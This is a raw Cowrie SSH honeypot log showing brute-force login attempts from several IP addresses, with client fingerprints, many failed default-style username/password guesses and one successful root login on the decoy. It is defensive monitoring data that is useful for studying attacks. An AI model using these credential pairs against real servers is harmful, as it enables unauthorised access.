{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"2.1","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:58:00.977965Z","src_ip":"201.148.180.50","session":"601f92616961"}
{"eventid":"cowrie.session.closed","duration":"14.0","message":"Connection lost after 14.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:58:00.979202Z","src_ip":"201.148.180.50","session":"601f92616961"}
{"eventid":"cowrie.session.closed","duration":"21.8","message":"Connection lost after 21.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:58:01.196512Z","src_ip":"212.227.125.160","session":"b9acbeae204b"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar123","message":"login attempt [oscar/oscar123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:58:04.525146Z","src_ip":"212.227.235.229","session":"832cd625be28"}
{"eventid":"cowrie.session.closed","duration":"66.4","message":"Connection lost after 66.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:58:12.936853Z","src_ip":"212.227.235.229","session":"832cd625be28"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":32984,"dst_ip":"1.2.3.4","dst_port":22,"session":"1654b172ad67","protocol":"ssh","message":"New connection: 41.226.27.251:32984 (1.2.3.4:22) [session: 1654b172ad67]","sensor":"my-vps","timestamp":"2025-08-31T02:58:17.823897Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:58:17.824798Z","src_ip":"41.226.27.251","session":"1654b172ad67"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:58:17.868673Z","src_ip":"41.226.27.251","session":"1654b172ad67"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger","message":"login attempt [ranger/ranger] failed","sensor":"my-vps","timestamp":"2025-08-31T02:58:18.003214Z","src_ip":"41.226.27.251","session":"1654b172ad67"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46930,"dst_ip":"1.2.3.4","dst_port":22,"session":"47b2705c9531","protocol":"ssh","message":"New connection: 212.227.235.229:46930 (1.2.3.4:22) [session: 47b2705c9531]","sensor":"my-vps","timestamp":"2025-08-31T02:58:18.366495Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:58:19.167213Z","src_ip":"212.227.235.229","session":"47b2705c9531"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:58:19.168005Z","src_ip":"212.227.235.229","session":"47b2705c9531"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:58:19.334491Z","src_ip":"41.226.27.251","session":"1654b172ad67"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"1234567","message":"login attempt [ftpuser/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T02:58:24.354000Z","src_ip":"212.227.235.229","session":"47b2705c9531"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50266,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1f4a87048bb","protocol":"ssh","message":"New connection: 212.227.235.229:50266 (1.2.3.4:22) [session: e1f4a87048bb]","sensor":"my-vps","timestamp":"2025-08-31T02:58:25.936129Z"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:58:26.192890Z","src_ip":"212.227.235.229","session":"47b2705c9531"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45382,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f67dc0fa416","protocol":"ssh","message":"New connection: 212.227.235.229:45382 (1.2.3.4:22) [session: 5f67dc0fa416]","sensor":"my-vps","timestamp":"2025-08-31T02:58:31.908848Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:58:31.909778Z","src_ip":"212.227.235.229","session":"5f67dc0fa416"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:58:32.158790Z","src_ip":"212.227.235.229","session":"5f67dc0fa416"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask123","message":"login attempt [flask/flask123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:58:32.908180Z","src_ip":"212.227.235.229","session":"5f67dc0fa416"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:58:34.160067Z","src_ip":"212.227.235.229","session":"5f67dc0fa416"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:58:36.979172Z","src_ip":"212.227.235.229","session":"e1f4a87048bb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:58:36.980116Z","src_ip":"212.227.235.229","session":"e1f4a87048bb"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":57814,"dst_ip":"1.2.3.4","dst_port":22,"session":"b44ab0da8bf5","protocol":"ssh","message":"New connection: 41.226.27.251:57814 (1.2.3.4:22) [session: b44ab0da8bf5]","sensor":"my-vps","timestamp":"2025-08-31T02:58:37.868042Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:58:37.868951Z","src_ip":"41.226.27.251","session":"b44ab0da8bf5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:58:37.911784Z","src_ip":"41.226.27.251","session":"b44ab0da8bf5"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abc123","message":"login attempt [oracle/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:58:38.041610Z","src_ip":"41.226.27.251","session":"b44ab0da8bf5"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:58:39.282184Z","src_ip":"41.226.27.251","session":"b44ab0da8bf5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37168,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5d175faefc2","protocol":"ssh","message":"New connection: 212.227.125.160:37168 (1.2.3.4:22) [session: f5d175faefc2]","sensor":"my-vps","timestamp":"2025-08-31T02:58:40.043196Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:58:40.478754Z","src_ip":"212.227.125.160","session":"f5d175faefc2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:58:40.479402Z","src_ip":"212.227.125.160","session":"f5d175faefc2"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"1234567","message":"login attempt [ftpuser/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T02:58:42.748450Z","src_ip":"212.227.125.160","session":"f5d175faefc2"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:58:44.364380Z","src_ip":"212.227.125.160","session":"f5d175faefc2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46098,"dst_ip":"1.2.3.4","dst_port":22,"session":"32201468fb8d","protocol":"ssh","message":"New connection: 212.227.125.160:46098 (1.2.3.4:22) [session: 32201468fb8d]","sensor":"my-vps","timestamp":"2025-08-31T02:58:54.878168Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":43006,"dst_ip":"1.2.3.4","dst_port":22,"session":"352fd596311d","protocol":"ssh","message":"New connection: 41.226.27.251:43006 (1.2.3.4:22) [session: 352fd596311d]","sensor":"my-vps","timestamp":"2025-08-31T02:58:58.263967Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:58:58.270466Z","src_ip":"41.226.27.251","session":"352fd596311d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:58:58.308626Z","src_ip":"41.226.27.251","session":"352fd596311d"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp123","message":"login attempt [ftp/ftp123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:58:58.482907Z","src_ip":"41.226.27.251","session":"352fd596311d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:58:59.821128Z","src_ip":"41.226.27.251","session":"352fd596311d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54138,"dst_ip":"1.2.3.4","dst_port":22,"session":"47e936b1550d","protocol":"ssh","message":"New connection: 212.227.235.229:54138 (1.2.3.4:22) [session: 47e936b1550d]","sensor":"my-vps","timestamp":"2025-08-31T02:59:00.992880Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:59:00.993847Z","src_ip":"212.227.235.229","session":"47e936b1550d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:59:01.246236Z","src_ip":"212.227.235.229","session":"47e936b1550d"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"weblogic","message":"login attempt [weblogic/weblogic] failed","sensor":"my-vps","timestamp":"2025-08-31T02:59:02.004401Z","src_ip":"212.227.235.229","session":"47e936b1550d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:59:03.259325Z","src_ip":"212.227.235.229","session":"47e936b1550d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49940,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8b169489964","protocol":"ssh","message":"New connection: 212.227.235.229:49940 (1.2.3.4:22) [session: e8b169489964]","sensor":"my-vps","timestamp":"2025-08-31T02:59:14.384865Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-31T02:59:14.386457Z","src_ip":"212.227.235.229","session":"e8b169489964"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:59:14.387163Z","src_ip":"212.227.235.229","session":"e8b169489964"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49948,"dst_ip":"1.2.3.4","dst_port":22,"session":"a573a6487730","protocol":"ssh","message":"New connection: 212.227.235.229:49948 (1.2.3.4:22) [session: a573a6487730]","sensor":"my-vps","timestamp":"2025-08-31T02:59:14.691044Z"}
{"eventid":"cowrie.client.version","version":"GET /favicon.ico HTTP/1.1","message":"Remote SSH version: GET /favicon.ico HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-31T02:59:14.691778Z","src_ip":"212.227.235.229","session":"a573a6487730"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:59:14.692765Z","src_ip":"212.227.235.229","session":"a573a6487730"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@wsx","message":"login attempt [root/1qaz@wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:59:16.569389Z","src_ip":"212.227.235.229","session":"e1f4a87048bb"}
{"eventid":"cowrie.session.closed","duration":"21.8","message":"Connection lost after 21.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:59:16.648115Z","src_ip":"212.227.125.160","session":"32201468fb8d"}
{"eventid":"cowrie.session.connect","src_ip":"193.105.134.95","src_port":11848,"dst_ip":"1.2.3.4","dst_port":22,"session":"574543682e45","protocol":"ssh","message":"New connection: 193.105.134.95:11848 (1.2.3.4:22) [session: 574543682e45]","sensor":"my-vps","timestamp":"2025-08-31T02:59:17.864289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PuTTY_Release_0.63","message":"Remote SSH version: SSH-2.0-PuTTY_Release_0.63","sensor":"my-vps","timestamp":"2025-08-31T02:59:17.871909Z","src_ip":"193.105.134.95","session":"574543682e45"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-08-31T02:59:17.915766Z","src_ip":"193.105.134.95","session":"574543682e45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55648,"dst_ip":"1.2.3.4","dst_port":22,"session":"fac6e44b7ee2","protocol":"ssh","message":"New connection: 212.227.235.229:55648 (1.2.3.4:22) [session: fac6e44b7ee2]","sensor":"my-vps","timestamp":"2025-08-31T02:59:18.577770Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":52128,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0c815dffca3","protocol":"ssh","message":"New connection: 41.226.27.251:52128 (1.2.3.4:22) [session: e0c815dffca3]","sensor":"my-vps","timestamp":"2025-08-31T02:59:18.615976Z"}
